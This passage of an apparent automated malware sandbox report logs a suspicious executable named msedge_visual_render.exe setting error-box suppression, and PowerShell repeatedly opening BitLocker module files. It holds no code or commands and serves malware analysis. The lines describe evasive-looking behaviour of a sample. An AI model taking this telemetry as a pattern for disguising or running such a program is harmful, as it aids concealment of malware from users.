              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
